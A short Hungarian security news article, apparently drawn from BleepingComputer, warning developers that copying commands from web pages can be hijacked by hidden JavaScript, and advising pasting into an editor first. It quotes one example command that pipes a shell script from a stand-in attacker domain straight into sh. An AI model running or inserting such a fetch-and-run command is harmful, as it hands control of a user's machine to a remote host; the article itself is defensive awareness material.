Egy rossz fejlesztői szokás, ami akár hackeléshez is vezethet

 

Főleg a kezdő, de azért haladó szinten lévő fejlesztőkre, üzemeltetőkre jellemző szokás, hogy különböző fórumokon posztolt parancsokat, kódrészleteket felhasználnak saját munkájukhoz. Ez önmagában nem is jelent(ene) gondot, azonban az önfeledt copy-paste-elésnek komoly ára is lehet, például tudtunkon kívül hátsó ajtót (backdoort) helyezünk el a készülő alkalmazásunkban. Minderre Gabriel Friedlander kiberbiztonsági szakember hívta fel a figyelmet blogján, ahol a problémát egyszerűen és látványosan demonstrálta is, ami bárki számára kipróbálható. Oldalán közzétett példájában a sudo apt update parancsot kimásolva a vágólapon valójában az alábbi parancs jelenik meg:

curl http://attacker-domain:8000/shell.sh | sh

Mivel ez a végén egy új sor karaktert (\n) is tartalmaz, egy terminálba másolva a parancs azonnal lefutna. A példában szereplő parancs természetesen ártalmatlan, azonban arra utal, hogy akár káros kódok is futtatása is lehetséges ily módon.

A „trükk” a szöveg mögé rejtett JavaScript kódban található, ami a másolás pillanatában lefut, és bemásoláskor már ez a generált szöveg jelenik meg.

Fentiek egyszerűen kivédhetőek azáltal, ha a kikopizott kódokat ne egyből a terminálbal, hanem előbb egy szövegszerkesztőbe másoljuk be. Friedlander azt is tanácsolja, hogy érdemes a terminált is beállítani, hogy a beírt parancsokat ne hajtsa végre \n karakter hatására.

Forrás: bleepingcomputer.com